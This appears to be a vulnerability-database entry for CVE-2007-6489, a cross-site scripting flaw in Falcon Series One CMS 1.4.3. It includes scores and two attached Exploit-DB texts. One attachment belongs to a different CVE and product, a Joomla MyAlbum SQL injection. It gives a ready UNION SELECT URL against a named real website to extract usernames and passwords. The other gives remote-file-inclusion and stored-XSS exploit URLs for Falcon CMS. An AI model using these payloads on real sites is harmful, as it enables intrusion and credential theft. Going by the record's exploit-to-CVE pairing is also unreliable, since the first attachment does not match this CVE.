CVE-2007-6489
Published: 2007-12-20
Priority: P3 (35) · Severity: high · CVSS 2.0 base score: 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available · EPSS: 6.84% (93.2nd percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Falcon Series One CMS 1.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gb_mail, (2) gb_name, and (3) gb_text parameters in a guestbook action to index.php, and unspecified other vectors.
Affected (1 range):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| falcon | series_one_cms | — | — |
No detection rules found.
Exploit-DB: Joomla! Component MyAlbum 1.0 - 'album' SQL Injection (CVE-2008-6489, exploitdb, 2008-03-28)
```text
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
http://[target]/index.php?option=com_myalbum&album=[SQL]
Example:
http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
greetz : VoLqaN
http://inso.host.sk
side note:
myalbum
01.06.2007
Hüseyin Bora ABACI
GNU/GPL
[email protected]
www.joomla.org
1.0
MyAlbum is a practical, comfortable, fast, simple picture gallery component.
# milw0rm.com [2008-03-28]
```
Exploit-DB: falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting (CVE-2007-6490, exploitdb, 2007-12-10)
```text
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Multiple Remote File Inclusion - Permanent XSS
# Author: MhZ91
# Title: Falcon Series One - Multiple Remote File Inclusion + Permanent XSS
# Download: http://sourceforge.net/projects/falconcms/
# Bug: Multiple Remote File Inclusion + Permanent XSS
# Severity: High
# Visit: http://www.inj3ct-it.org
Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]
Vuln code: @include_once ($dir['classes']."class.pages.php");
Exploit: http://[site]/errors.php?error=[Evil_Code]
Vuln code:
Permanent XSS at http://[site]/index.php?guestbook=v in the input gb_mai
```
No writeups or analysis indexed.